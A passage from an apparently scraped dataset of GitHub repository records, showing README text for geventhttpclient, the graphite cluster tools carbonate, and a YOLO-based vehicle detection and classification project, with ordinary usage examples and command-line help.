More generally it is\ndesigned for efficiently pulling from REST APIs and streaming APIs\nlike Twitter's.\n\nSafe SSL support is provided by default. **geventhttpclient** depends on\nthe certifi CA Bundle. This is the same CA Bundle which ships with the\nRequests codebase, and is derived from Mozilla Firefox's canonical set.\n\nAs of version 1.5, only Python 3.6+ is fully supported (with prebuilt wheels), \nbut Python 2.7 and 3.5 *should* work too.\n\nUse of SSL/TLS with python 2.7.9 is not recommended and may be broken.\n\nA simple example:\n\n```python\n#!/usr/bin/python\n\nfrom geventhttpclient import HTTPClient\nfrom geventhttpclient.url import URL\n\nurl = URL('http://gevent.org/')\n\nhttp = HTTPClient(url.host)\n\n# issue a get request\nresponse = http.get(url.request_uri)\n\n# read status_code\nresponse.status_code\n\n# read response body\nbody = response.read()\n\n# close connections\nhttp.close()\n```\n\n## httplib compatibility and monkey patch\n\n**geventhttpclient.httplib** module contains classes for drop in\nreplacement of httplib connection and response objects.\nIf you use httplib directly you can replace the **httplib** imports\nby **geventhttpclient.httplib**.\n\n```python\n# from httplib import HTTPConnection\nfrom geventhttpclient.httplib import HTTPConnection\n```\n\nIf you use **httplib2**, **urllib** or **urllib2**; you can patch **httplib** to\nuse the wrappers from **geventhttpclient**.\nFor **httplib2**, make sure you patch before you import or the *super*\ncalls will fail.\n\n```python\nimport geventhttpclient.httplib\ngeventhttpclient.httplib.patch()\n\nimport httplib2\n```\n\n## High Concurrency\n\nHTTPClient has connection pool built in and is greenlet safe by design.\nYou can use the same instance among several greenlets.\n\n```python\n#!/usr/bin/env python\n\nimport gevent.pool\nimport json\n\nfrom geventhttpclient import HTTPClient\nfrom geventhttpclient.url import URL\n\n\n# go to http://developers.facebook.com/tools/explorer and copy the access token\nTOKEN = ''\n\nurl = URL('https://graph.facebook.com/me/friends')\nurl['access_token'] = TOKEN\n\n# setting the concurrency to 10 allow to create 10 connections and\n# reuse them.\nhttp = HTTPClient.from_url(url, concurrency=10)\n\nresponse = http.get(url.request_uri)\nassert response.status_code == 200\n\n# response comply to the read protocol. It passes the stream to\n# the json parser as it's being read.\ndata = json.load(response)['data']\n\ndef print_friend_username(http, friend_id):\n friend_url = URL('/' + str(friend_id))\n friend_url['access_token'] = TOKEN\n # the greenlet will block until a connection is available\n response = http.get(friend_url.request_uri)\n assert response.status_code == 200\n friend = json.load(response)\n if friend.has_key('username'):\n print '%s: %s' % (friend['username'], friend['name'])\n else:\n print '%s has no username.' 
% friend['name']\n\n# allow to run 20 greenlet at a time, this is more than concurrency\n# of the http client but isn't a problem since the client has its own\n# connection pool.\npool = gevent.pool.Pool(20)\nfor item in data:\n friend_id = item['id']\n pool.spawn(print_friend_username, http, friend_id)\n\npool.join()\nhttp.close()\n```\n\n## Streaming\n\n**geventhttpclient** supports streaming.\nResponse objects have a read(N) and readline() method that read the stream\nincrementally.\nSee *src/examples/twitter_streaming.py* for pulling twitter stream API.\n\nHere is an example on how to download a big file chunk by chunk to save memory:\n\n```python\n#!/usr/bin/env python\n\nfrom geventhttpclient import HTTPClient, URL\n\nurl = URL('http://127.0.0.1:80/100.dat')\nhttp = HTTPClient.from_url(url)\nresponse = http.get(url.query_string)\nassert response.status_code == 200\n\nCHUNK_SIZE = 1024 * 16 # 16KB\nwith open('/tmp/100.dat', 'w') as f:\n data = response.read(CHUNK_SIZE)\n while data:\n f.write(data)\n data = response.read(CHUNK_SIZE)\n```\n\n## Benchmarks\n\nThe benchmark does 1000 get requests against a local nginx server with\na concurrency of 10. See *benchmarks* folder.\n\n- httplib2 with geventhttpclient monkey patch (*benchmarks/httplib2_patched.py*): **~2500 req/s**\n- geventhttpclient.HTTPClient (*benchmarks/httpclient.py*): **~4000 req/s**\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "graphite-project/carbonate", "link": "https://github.com/graphite-project/carbonate", "tags": ["carbonate", "graphite-clusters", "graphite", "python"], "stars": 511, "description": "Utilities for managing graphite clusters", "lang": "Python", "repo_lang": "", "readme": "# Carbonate\n\n> \"Pop bottles.\" *-- Birdman*\n\n[![Codacy Badge](https://api.codacy.com/project/badge/Grade/99e1654102b74d82a63505145334e7ed)](https://www.codacy.com/app/graphite-project/carbonate?utm_source=github.com&utm_medium=referral&utm_content=graphite-project/carbonate&utm_campaign=badger)\n[![Build Status](https://travis-ci.org/graphite-project/carbonate.svg?branch=master)](https://travis-ci.org/graphite-project/carbonate)\n[![FOSSA Status](https://app.fossa.io/api/projects/git%2Bhttps%3A%2F%2Fgithub.com%2Fgraphite-project%2Fcarbonate.svg?type=shield)](https://app.fossa.io/projects/git%2Bhttps%3A%2F%2Fgithub.com%2Fgraphite-project%2Fcarbonate?ref=badge_shield)\n[![codecov](https://codecov.io/gh/graphite-project/carbonate/branch/master/graph/badge.svg)](https://codecov.io/gh/graphite-project/carbonate)\n\nGraphite clusters are pretty cool. Here are some primitive tools to help you manage your graphite clusters.\n\nAll of the tools support two common arguments; the path to a config file, and the name of the cluster. Using these tools alongside a config file that describes your graphite clusters you can build up scripts to manage your metrics. Some of the tools could easily be replaced with one-liners in shell, but exist here for convenience and readability. The goal is to provide fast, predictable utilities that can easily be composed into more advanced tooling.\n\n## Install\n[Carbonate is available from Python official third party repository](https://pypi.python.org/pypi/carbonate/0.2.1) (aka PyPi) and as such can be installed via regular Python package managers.\nNote that you might have to install a python package manager (e.g. 
apt-get install python-setuptools on an Ubuntu host)\n\n```\npip install carbonate\n```\n\n## The Config\n\nCarbonate expects a configuration file that defines the clusters in your environment. The default config file is located at `/opt/graphite/conf/carbonate.conf` or can be provided on the command line. The default cluster is named 'main'. Both defaults can be overridden by setting the environment variables `CARBONATE_CONFIG` and `CARBONATE_CLUSTER` respectively.\n\n```\n[main]\nDESTINATIONS = 192.168.9.13:2004:carbon01, 192.168.9.15:2004:carbon02, 192.168.6.20:2004:carbon03\nREPLICATION_FACTOR = 2\nSSH_USER = carbon\n\n[agg]\nDESTINATIONS = 192.168.9.13:2004:carbon01, 192.168.9.15:2004:carbon02, 192.168.6.20:2004:carbon03\nRELAY_METHOD = aggregated-consistent-hashing\nREPLICATION_FACTOR = 2\nSSH_USER = carbon\n\n[fnv]\nDESTINATIONS = 192.168.9.13:2004:ba603c36342304ed77953f84ac4d357b, 192.168.9.15:2004:5dd63865534f84899c6e5594dba6749a, 192.168.6.20:2004:866a18b81f2dc4649517a1df13e26f28\nREPLICATION_FACTOR = 2\nSSH_USER = carbonate\nHASHING_TYPE = fnv1a_ch\n```\n\nYou should take care to match the list of destination IPs or hostnames to the nodes in your cluster (i.e. it should match the routing configuration of your carbon relay). Order is important because of how the consistent hash ring is created.\n\nYou can configure the relay method to be one of \"consistent-hashing\" or \"aggregated-consistent-hashing\". If omitted, \"consistent-hashing\" is used by default. Use of \"aggregated-consistent-hashing\" usually requires a rules file to be provided to relevant commands.\n\nThe replication factor should match the replication factor for the cluster.\n\nAlso, you can choose to provide an SSH user that will be used when carbonate requires connecting to another node in the cluster to perform an operation. If this is not provided, then the current user executing the command will be chosen.\n\nFinally, you can provide the HASHING_TYPE of your cluster. The default is `carbon_ch`; `fnv1a_ch` is also supported (a short config-parsing sketch follows below). 
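\n\nAs a rough, hypothetical illustration of the config format shown above (this is not carbonate's own loading code), a cluster section like `[main]` can be read with Python's standard `configparser`; the file path, section name, and option names below simply mirror the sample config:\n\n```python\nfrom configparser import ConfigParser\n\n# Sketch only: read a carbonate-style cluster definition.\nparser = ConfigParser()\nparser.read(\"/opt/graphite/conf/carbonate.conf\")\n\ncluster = parser[\"main\"]\ndestinations = [d.strip() for d in cluster[\"DESTINATIONS\"].split(\",\")]\nreplication_factor = cluster.getint(\"REPLICATION_FACTOR\")\nhashing_type = cluster.get(\"HASHING_TYPE\", \"carbon_ch\")  # carbon_ch is the documented default\n\nprint(destinations)        # ['192.168.9.13:2004:carbon01', ...]\nprint(replication_factor)  # 2\nprint(hashing_type)\n```\n\n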
Please note that for using `fnv1a_ch` hashing you need `carbon` 1.0.2 or newer installed (or you need to use [carbon-c-relay](https://github.com/grobian/carbon-c-relay) relay instead).\n\n## The Tools\n\n### carbon-hosts\n\n```\nusage: carbon-hosts [-h] [-c CONFIG_FILE] [-C CLUSTER]\n\nReturn the addresses for all nodes in a cluster\n\noptional arguments:\n -h, --help show this help message and exit\n -c CONFIG_FILE, --config-file CONFIG_FILE\n Config file to use (default:\n /opt/graphite/conf/carbonate.conf)\n -C CLUSTER, --cluster CLUSTER\n Cluster name (default: main)\n```\n\n### carbon-lookup\n\n```\nusage: carbon-lookup [-h] [-c CONFIG_FILE] [-C CLUSTER] [-s] METRIC\n\nLookup where a metric lives in a carbon cluster\n\npositional arguments:\n METRIC Full metric name to search for\n\noptional arguments:\n -h, --help show this help message and exit\n -c CONFIG_FILE, --config-file CONFIG_FILE\n Config file to use (default:\n /opt/graphite/conf/carbonate.conf)\n -C CLUSTER, --cluster CLUSTER\n Cluster name (default: main)\n -a AGGREGATION_RULES, --aggregation-rules AGGREGATION_RULES\n File containing rules used in conjunction with the\n \"aggregated-consistent-hashing\" relay method (default:\n /opt/graphite/conf/aggregation-rules.conf)\n -s, --short Only display the address, without port and cluster\n name (default: False)\n```\n\n### carbon-list\n\n```\nusage: carbon-list [-h] [-c CONFIG_FILE] [-C CLUSTER] [-d STORAGE_DIR]\n\nList the metrics this carbon node contains\n\noptional arguments:\n -h, --help show this help message and exit\n -c CONFIG_FILE, --config-file CONFIG_FILE\n Config file to use (default:\n /opt/graphite/conf/carbonate.conf)\n -C CLUSTER, --cluster CLUSTER\n Cluster name (default: main)\n -d STORAGE_DIR, --storage-dir STORAGE_DIR\n Storage dir (default: /opt/graphite/storage/whisper)\n```\n\n### carbon-sieve\n\n```\nusage: carbon-sieve [-h] [-c CONFIG_FILE] [-C CLUSTER] [-f METRICS_FILE]\n [-n NODE] [-I]\n\nGiven a list of metrics, output those that belong to a node\n\noptional arguments:\n -h, --help show this help message and exit\n -c CONFIG_FILE, --config-file CONFIG_FILE\n Config file to use (default:\n /opt/graphite/conf/carbonate.conf)\n -C CLUSTER, --cluster CLUSTER\n Cluster name (default: main)\n -a AGGREGATION_RULES, --aggregation-rules AGGREGATION_RULES\n File containing rules used in conjunction with the\n \"aggregated-consistent-hashing\" relay method (default:\n /opt/graphite/conf/aggregation-rules.conf)\n -f METRICS_FILE, --metrics-file METRICS_FILE\n File containing metric names to filter, or '-' to read\n from STDIN (default: -)\n -n NODE, --node NODE Filter for metrics belonging to this node (default:\n self)\n -I, --invert Invert the sieve, match metrics that do NOT belong to\n a node (default: False)\n```\n\n### carbon-sync\n\n```\nusage: carbon-sync [-h] [-c CONFIG_FILE] [-C CLUSTER] [-f METRICS_FILE] -s\n SOURCE_NODE [-d STORAGE_DIR] [-b BATCH_SIZE]\n [--source-storage-dir SOURCE_STORAGE_DIR]\n [--rsync-options RSYNC_OPTIONS] [--rsync-disable-copy-dest]\n [--tmpdir TMP_STAGING_DIR] [--rsync-max-retries MAX_RETRIES]\n [--rsync-retries-interval SECONDS] [--dirty] [-l] [-o]\n\nSync local metrics using remote nodes in the cluster\n\noptional arguments:\n -h, --help show this help message and exit\n -c CONFIG_FILE, --config-file CONFIG_FILE\n Config file to use (env: CARBONATE_CONFIG) (default:\n /opt/graphite/conf/carbonate.conf)\n -C CLUSTER, --cluster CLUSTER\n Cluster name (env: CARBONATE_CLUSTER) (default: main)\n -f METRICS_FILE, 
--metrics-file METRICS_FILE\n File containing metric names to filter, or '-' to read\n from STDIN (default: -)\n -s SOURCE_NODE, --source-node SOURCE_NODE\n Override the source for metrics data (default: None)\n -d STORAGE_DIR, --storage-dir STORAGE_DIR\n Storage dir (default: /opt/graphite/storage/whisper)\n -b BATCH_SIZE, --batch-size BATCH_SIZE\n Batch size for the rsync job (default: 1000)\n --source-storage-dir SOURCE_STORAGE_DIR\n Source storage dir (default:\n /opt/graphite/storage/whisper)\n --rsync-options RSYNC_OPTIONS\n Pass option(s) to rsync. Make sure to use \"--rsync-\n options=\" if option starts with '-' (default: -azpS)\n --rsync-disable-copy-dest\n Avoid --copy-dest, transfer all whisper data between\n nodes. (default: False)\n --rsync-max-retries RETRIES\n Number of times rsync will attempt to copy each batch\n of metrics before moving on. If all retry attempts are\n unsuccessful, carbon-sync will write a file containing\n the name of each metric in the failed batch so they can\n be easily retried at a later time. (Default: 3)\n --rsync-retries-interval SECONDS\n How long to wait in between each rsync retry attempt\n (see --rsync-max-retries). (default: 5)\n -t TMP_STAGING_DIR, --tmpdir TMP_STAGING_DIR\n Specify an alternate location in which the temporary\n rsync staging dirs will be created. This can be useful\n for large syncs where the default location (as chosen\n by mkdtemp) resides on a filesystem that's too small\n to store all the metrics being copied from the remote\n host.\n --dirty If set, don't clean temporary rsync directory\n (default: False)\n -l, --lock Lock whisper files during filling (default: False)\n -o, --overwrite Write all non nullpoints from src to dst (default:\n False)\n```\n\n### carbon-path\n\n```\nusage: carbon-path [-h] [-c CONFIG_FILE] [-C CLUSTER] [-f METRICS_FILE] [-r]\n [-p] [-d STORAGE_DIR]\n\nTransform metric paths to (or from) filesystem paths\n\noptional arguments:\n -h, --help show this help message and exit\n -c CONFIG_FILE, --config-file CONFIG_FILE\n Config file to use (default:\n /opt/graphite/conf/carbonate.conf)\n -C CLUSTER, --cluster CLUSTER\n Cluster name (default: main)\n -f METRICS_FILE, --metrics-file METRICS_FILE\n File containing metric names to transform to file\n paths, or '-' to read from STDIN (default: -)\n -r, --reverse Transform from file paths to metric paths (default:\n False)\n -p, --prepend Prepend storage dir to file paths (default: False)\n -d STORAGE_DIR, --storage-dir STORAGE_DIR\n Whisper storage directory to prepend when -p given\n (default: /opt/graphite/storage/whisper)\n```\n\n### carbon-stale\n\n```\nusage: carbon-stale [-h] [-c CONFIG_FILE] [-C CLUSTER] [-f METRICS_FILE] [-r]\n [-d STORAGE_DIR] [-l HOURS] [-o HOURS] [-w] [-p]\n\nFind and list potentially stale metrics.\n\noptional arguments:\n -h, --help show this help message and exit\n -c CONFIG_FILE, --config-file CONFIG_FILE\n Config file to use (default:\n /opt/graphite/conf/carbonate.conf)\n -C CLUSTER, --cluster CLUSTER\n Cluster name (default: main)\n -f METRICS_FILE, --metrics-file METRICS_FILE\n File containing metric names to transform to file\n paths, or '-' to read from STDIN (default: -)\n -r, --reverse Output metrics which are not stale instead (default:\n False)\n -d STORAGE_DIR, --storage-dir STORAGE_DIR\n Whisper storage directory to prepend when -p given\n (default: /opt/graphite/storage/whisper)\n -l HOURS, --limit HOURS\n Definition of staleness, in hours (default: 24)\n -o HOURS, --offset HOURS\n Use a whisper data window 
ending HOURS ago (implies\n -w) (default: 0)\n -w, --whisper Use whisper data instead of filesystem stat() call\n (default: False)\n -p, --paths Print filesystem paths instead of metric names\n (default: False)\n```\n\n### whisper-aggregate\n\n```\nusage: whisper-aggregate [-h] [-f METRICS_FILE] [-d STORAGE_DIR]\n\nSet aggregation for whisper-backed metrics this carbon instance contains\n\noptional arguments:\n -h, --help show this help message and exit\n -f METRICS_FILE, --metrics-file METRICS_FILE\n File containing metric names and aggregation modes, or\n '-' to read from STDIN (default: -)\n -d STORAGE_DIR, --storage-dir STORAGE_DIR\n Whisper storage directory (default:\n /opt/graphite/storage/whisper)\n```\n\n### whisper-fill\n\n```\nusage: whisper-fill [-h] [-l] [-o] SRC DST\n\nBackfill datapoints from one whisper file into another\n\npositional arguments:\n SRC Whisper source file\n DST Whisper destination file\n\noptional arguments:\n -h, --help show this help message and exit\n -l, --lock Lock whisper files during filling (default: False)\n -o, --overwrite Write all non nullpoints from src to dst (default: False)\n```\n\n## Example usage\n\n### Resync a node in a cluster\n\n```\n#!/bin/sh\n#\n# Resync a node from other nodes in the cluster\n#\n\nLOCAL_IP=\"$1\"\n\nfor h in $(carbon-hosts) ; do\n (\n ssh $h -- carbon-list |\n carbon-sieve -n $LOCAL_IP |\n carbon-sync -s $h\n ) &\ndone\n```\n\n### Rebalance a cluster\n\n```\n#!/bin/sh\n#\n# Rebalance a cluster from one size to another. Remember to cleanup metrics\n# that no longer belong when all nodes are rebalanced!\n#\n\nLOCAL_IP=\"$1\"\nOLD_CLUSTER=\"old\"\nNEW_CLUSTER=\"main\"\n\nfor h in $(carbon-hosts -C \"$OLD_CLUSTER\") ; do\n ssh $h -- carbon-list |\n carbon-sieve -C \"$NEW_CLUSTER\" -n $LOCAL_IP |\n carbon-sync -s $h\ndone\n```\n\n### List metrics that don't belong\n\n```\n#!/bin/sh\n#\n# List metrics from disk that don't belong\n#\n\nLOCAL_IP=\"$1\"\n\ncarbon-list | carbon-sieve -I -n $LOCAL_IP\n```\n\n### Listing metrics that have stopped updating\n\nMetrics with whisper data that is entirely blank for the last 2 hours (perhaps\nuseful if you suspect issues with fs timestamps or carbon clients writing in 'the\nfuture'):\n\n```\ncarbon-list | carbon-stale --whisper --limit=2\n```\n\nMetrics whose metrics files appear untouched for 48 hours or more (functionally\nidentical to `find /your/data/dir -type f -mtime +2`):\n\n```\ncarbon-list | carbon-stale --limit=48\n```\n\nMore interesting is if you use ``carbon-stale``, then sieve to identify stale\nmetrics that don't belong here (vs un-stale metrics that *do* belong here but\nare misreported in carbon-sieve due to things like doubled-up periods in metric\npaths due to broken collectors. It's a thing.)\n\n```\ncarbon-list | carbon-stale --limit=48 | carbon-sieve -I -n $LOCAL_IP\n```\n\nTo print file paths for use with e.g. 
`xargs rm` or whatnot, use `-p`:\n\n```\ncarbon-list | carbon-stale -p | xargs -n 100 rm\n```\n\n\n# License\n\nThe code is available under the MIT license.\n\n\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "CaptainEven/Vehicle-Car-detection-and-multilabel-classification", "link": "https://github.com/CaptainEven/Vehicle-Car-detection-and-multilabel-classification", "tags": [], "stars": 511, "description": "\u4f7f\u7528YOLO_v3_tiny\u548cB-CNN\u5b9e\u73b0\u8857\u5934\u8f66\u8f86\u7684\u68c0\u6d4b\u548c\u8f66\u8f86\u5c5e\u6027\u7684\u591a\u6807\u7b7e\u8bc6\u522b Using yolo_v3_tiny to do vehicle or car detection and attribute's multilabel classification or recognize", "lang": "Python", "repo_lang": "", "readme": "# Vehicle-Car-detection-and-multilabel-classification \u8f66\u8f86\u68c0\u6d4b\u548c\u591a\u6807\u7b7e\u5c5e\u6027\u8bc6\u522b\n## \u4e00\u4e2a\u57fa\u4e8ePytorch\u7cbe\u7b80\u7684\u6846\u67b6\uff0c\u4f7f\u7528YOLO_v3_tiny\u548cB-CNN\u5b9e\u73b0\u8857\u5934\u8f66\u8f86\u7684\u68c0\u6d4b\u548c\u8f66\u8f86\u5c5e\u6027\u7684\u591a\u6807\u7b7e\u8bc6\u522b\u3002
(A precise pytorch based framework for using yolo_v3_tiny to do vehicle or car detection and attribute's multilabel classification or recognize)\n\n## \u6548\u679c\u5982\u4e0b: Vehicle detection and recognition results are as follows\uff1a
\n![](https://github.com/CaptainEven/Vehicle-Car-detection-and-multilabel-classification/blob/master/test_result/test_5.jpg)\n![](https://github.com/CaptainEven/Vehicle-Car-detection-and-multilabel-classification/blob/master/test_result/test_17.jpg)\n
\n\n## \u4f7f\u7528\u65b9\u6cd5 Usage\npython Vehicle_DC -src_dir your_imgs_dir -dst_dir your_result_dir\n\n## \u8bad\u7ec3\u597d\u7684\u6a21\u578b\u6587\u4ef6(\u5305\u62ec\u8f66\u8f86\u68c0\u6d4b\u6a21\u578b\u548c\u591a\u6807\u7b7e\u5206\u7c7b\u6a21\u578b) trained models on baidu drive\n[Tranied models-vehicle detection](https://pan.baidu.com/s/1HwTCVGTmdqkeLnqnxfNL8Q)
\n[Tranied models-vehicle classification](https://pan.baidu.com/s/1XmzjvCgOrrVv0NWTt4Fm3g)
\n\u5728\u8fd0\u884cVehicle_DC\u811a\u672c\u4e4b\u524d\uff0c\u5148\u4e0b\u8f7d\u4e0a\u9762\u7684\u6a21\u578b\u6587\u4ef6\u6216\u8005\u4f7f\u7528\u81ea\u5df1\u9884\u5148\u8bad\u7ec3\u597d\u7684\u6a21\u578b\u6587\u4ef6\uff0c\u5c06car_540000.weights\uff08\u7528\u4e8e\u68c0\u6d4b\uff09\u653e\u5728\u9879\u76ee\u6839\u76ee\u5f55\uff0c\u5c06epoch_39.pth\uff08\u7528\u4e8e\u591a\u6807\u7b7e\u8bc6\u522b\uff09\u653e\u5728\u6839\u76ee\u5f55\u4e0b\u7684checkpoints\u76ee\u5f55\u4e0b\uff0c\u5373\u53ef\u4f7f\u7528Vehicle_DC\u8fd0\u884c\u3002
\nBefore running Vehicle_DC, download the provided model files above or use your own pretrained models. If you use the provided models, place car_540000.weights in the root directory of this project and place epoch_39.pth in root/checkpoints/.\n\n### \u7a0b\u5e8f\u7b80\u4ecb brief introductions\n#### (1). \u7a0b\u5e8f\u5305\u542b\u4e24\u5927\u6a21\u5757:\n
The program consists of two parts: first, car detection (only model loading and inference code is provided; if you need training code, you can refer to [pytorch_yolo_v3](https://github.com/eriklindernoren/PyTorch-YOLOv3#train)); second, car attribute classification (both training and testing code are provided; it predicts a vehicle's body color, body direction and car type).\n##### <1>. \u8f66\u8f86\u68c0\u6d4b\u6a21\u5757\uff1a \u53ea\u63d0\u4f9b\u68c0\u6d4b, \u8bad\u7ec3\u4ee3\u7801\u53ef\u4ee5\u53c2\u8003[pytorch_yolo_v3](https://github.com/eriklindernoren/PyTorch-YOLOv3#train);
\n##### <2>. \u591a\u6807\u7b7e\u8bc6\u522b\u6a21\u5757\uff1a\u5305\u542b\u8f66\u8f86\u989c\u8272\u3001\u8f66\u8f86\u671d\u5411\u3001\u8f66\u8f86\u7c7b\u578b\n\u5c06\u8fd9\u4e24\u4e2a\u6a21\u5757\u7ed3\u5408\u5728\u4e00\u8d77\uff0c\u53ef\u4ee5\u540c\u65f6\u5b9e\u73b0\u8f66\u8f86\u7684\u68c0\u6d4b\u548c\u8bc6\u522b\u3002\u4ee5\u6b64\u4e3a\u57fa\u7840\uff0c\u53ef\u4ee5\u5bf9\u5ba4\u5916\u667a\u80fd\u4ea4\u901a\u4fe1\u606f\uff0c\u8fdb\u884c\u4e00\u5b9a\u7a0b\u5ea6\u7684\u7ed3\u6784\u5316\u4fe1\u606f\u63d0\u53d6\u3002
\nCombining these two modules, you can do vehicle detection and multi-label recognition at the same time. Based on this information, some structured information about outdoor traffic scenes can be extracted.\n#### (2). \u7a0b\u5e8f\u6a21\u5757\u8be6\u89e3 modules detailed introduction
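\n\nBefore the individual modules are described, here is a minimal, self-contained sketch of how the two stages fit together. It is illustrative only: the helper names are hypothetical placeholders, not the actual API of VehicleDC.py.\n
\n```python\n# Illustrative two-stage flow: detect vehicle boxes, then classify each cropped ROI.\n# All names here are hypothetical stand-ins for the YOLOv3-tiny detector and the B-CNN classifier.\nimport numpy as np\n
\ndef detect_vehicles(img):\n    # placeholder for stage 1; would return (x1, y1, x2, y2) boxes of detected vehicles\n    return [(10, 20, 110, 220)]\n
\ndef classify_roi(roi):\n    # placeholder for stage 2; would return the color, direction and type labels of one ROI\n    return 'Yellow', 'Rear', 'suv'\n
\ndef run_pipeline(img):\n    results = []\n    for (x1, y1, x2, y2) in detect_vehicles(img):\n        roi = img[y1:y2, x1:x2]  # crop the detected vehicle region\n        results.append(((x1, y1, x2, y2), *classify_roi(roi)))\n    return results\n
\nprint(run_pipeline(np.zeros((480, 640, 3), dtype=np.uint8)))\n```\n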
\n##### <1>. VehicleDC.py
\n\u6b64\u6a21\u5757\u662f\u8f66\u8f86\u68c0\u6d4b\u548c\u8f66\u8f86\u591a\u6807\u7b7e\u8bc6\u522b\u63a5\u53e3\u7684\u5c01\u88c5\uff0c\u9700\u8981\u6307\u5b9a\u6d4b\u8bd5\u6e90\u76ee\u5f55\u548c\u7ed3\u679c\u8f93\u51fa\u76ee\u5f55\u3002\u4e3b\u7c7bCar_DC, \u51fd\u6570__init__\u4e3b\u8981\u8d1f\u8d23\u6c7d\u8f66\u68c0\u6d4b\u3001\u6c7d\u8f66\u8bc6\u522b\u4e24\u4e2a\u6a21\u578b\u7684\u521d\u59cb\u5316\u3002\n\u51fd\u6570detect_classify\u8d1f\u8d23\u9010\u5f20\u5bf9\u56fe\u50cf\u8fdb\u884c\u68c0\u6d4b\u548c\u8bc6\u522b\uff1a\u9996\u5148\u5bf9\u8f93\u5165\u56fe\u50cf\u8fdb\u884c\u9884\u5904\u7406\uff0c\u7edf\u4e00\u8f93\u5165\u683c\u5f0f\uff0c\u7136\u540e\uff0c\u8f93\u51fa\u8be5\u56fe\u50cf\u6240\u6709\u7684\u8f66\u7684\u68c0\u6d4b\u6846\u3002\u901a\u8fc7\u51fd\u6570process_predict\u505anms, \u5750\u6807\u7cfb\u8f6c\u6362\uff0c\u5f97\u5230\u6240\u6709\u6700\u7ec8\u7684\u68c0\u6d4b\u6846\u3002\u7136\u540e\uff0c\u7a0b\u5e8f\u8c03\u7528\u51fd\u6570cls_draw_bbox\uff0c\u5728cls_draw_bbox\u4e2d\uff0c\u9010\u4e00\u5904\u7406\u6bcf\u4e2a\u68c0\u6d4b\u6846\u3002\u9996\u5148\uff0c\u53d6\u51fa\u539f\u56fe\u50cf\u68c0\u6d4b\u6846\u533a\u57df\u68c0\u6d4b\u6846\u5bf9\u5e94\u7684\u7684ROI(region of interest)\uff0c \u5c06ROI\u9001\u5165\u8f66\u8f86\u591a\u6807\u7b7e\u5206\u7c7b\u5668\u3002\u5206\u7c7b\u5668\u8c03\u7528B-CNN\u7b97\u6cd5\u5bf9ROI\u4e2d\u7684\u8f66\u8f86\u8fdb\u884c\u591a\u6807\u7b7e\u5c5e\u6027\u5206\u7c7b\u3002\u53c2\u8003[paper link](http://vis-www.cs.umass.edu/bcnn/docs/bcnn_iccv15.pdf)\u3002B-CNN\u4e3b\u8981\u7528\u4e8e\u8bad\u7ec3\u7aef\u5230\u7aef\u7684\u7ec6\u7c92\u5ea6\u5206\u7c7b\u3002\u672c\u7a0b\u5e8f\u5bf9\u8bba\u6587\u4e2d\u7684\u7f51\u7edc\u7ed3\u6784\u505a\u4e86\u4e00\u5b9a\u7684\u9002\u5e94\u6027\u4fee\u6539\uff1a\u4e3a\u4e86\u517c\u987e\u7a0b\u5e8f\u7684\u63a8\u65ad\u901f\u5ea6\u548c\u51c6\u786e\u5ea6\uff0c\u4e0d\u540c\u4e8e\u8bba\u6587\u4e2d\u91c7\u7528\u7684Vgg-16\uff0c\u8fd9\u91cc\u7684B-CNN\u7684\u57fa\u7840\u7f51\u7edc\u91c7\u7528Resnet-18\u3002
\nThis module encapsulates the interfaces for vehicle detection and multi-label classification. You need to specify a source directory and a result directory. The main class is Car_DC. The pretrained models are loaded and initialized in function init(). In function detect_classify, each input image is pre-processed into a uniform format, and the raw bounding boxes are output for NMS and coordinate transformation. Classification and bounding box drawing are done in function cls_draw_box based on the bounding box ROIs. A bilinear CNN is used for fine-grained classification, and resnet-18 is used as the backbone instead of vgg-16 as a trade-off between accuracy and speed.\n
##### \u8017\u65f6\u7edf\u8ba1\u8017\u65f6 Time consuming\n\u8f66\u8f86\u68c0\u6d4b\uff1a \u5355\u5f20\u56fe\u50cf\u63a8\u65ad\u8017\u65f6\uff0c\u5728\u5355\u4e2aGTX 1050TI GPU\u4e0a\u7ea618ms\u3002
\n\u8f66\u8f86\u591a\u6807\u7b7e\u8bc6\u522b\uff1a\u5355\u5f20\u56fe\u50cf\u63a8\u65ad\u8017\u65f6\uff0c\u5728\u5355\u4e2aGTX TITAN GPU\u4e0a\u7ea67ms\uff0c\u5728\u5355\u4e2aGTX 1050TI GPU\u4e0a\u7ea610ms\u3002
\nVehicle detection: single image inference costs about 18ms on a single GTX 1050TI.
\nVehicle classification: single image inference costs about 10ms on a single GTX 1050TI.\n\n##### <2>. \u8f66\u8f86\u591a\u6807\u7b7e\u6570\u636e\u6a21\u5757\uff08\u7531\u4e8e\u4fdd\u5bc6\u534f\u8bae\u7b49\u539f\u56e0\u6682\u65f6\u4e0d\u80fd\u516c\u5f00\u6570\u636e\u96c6\uff09 dataset.py
\n\u8bad\u7ec3\u3001\u6d4b\u8bd5\u6570\u636e\u7c7b\u522b\u6309\u7167\u5b50\u76ee\u5f55\u5b58\u653e\uff0c\u5b50\u76ee\u5f55\u540d\u5373label\uff0cColor_Direction_type\uff0c\u5982Yellow_Rear_suv\u3002
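\n\nAs an illustration of this naming convention (a minimal sketch, not code taken from dataset.py), a folder name such as Yellow_Rear_suv splits into its three labels like this:\n
\n```python\n# Split a 'Color_Direction_type' folder name into its three label values.\ndef parse_label_dir(dir_name):\n    color, direction, car_type = dir_name.split('_')\n    return color, direction, car_type\n
\nprint(parse_label_dir('Yellow_Rear_suv'))  # ('Yellow', 'Rear', 'suv')\n```\n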
\nVehicle\u7c7b\u91cd\u8f7d\u4e86data.Dataset\u7684init, getitem, len\u65b9\u6cd5\uff1a
\n\u51fd\u6570__init__\u8d1f\u8d23\u521d\u59cb\u5316\u6570\u636e\u8def\u5f84\uff0c\u6570\u636e\u6807\u7b7e\uff0c\u7531\u4e8e\u6570\u636e\u6807\u7b7e\u662f\u591a\u6807\u7b7e\u7c7b\u578b\uff0c\u6545\u5bf9\u8f93\u51fa\u5411\u91cf\u5206\u6bb5\u8ba1\u7b97\u4ea4\u53c9\u71b5loss\u5373\u53ef\u3002
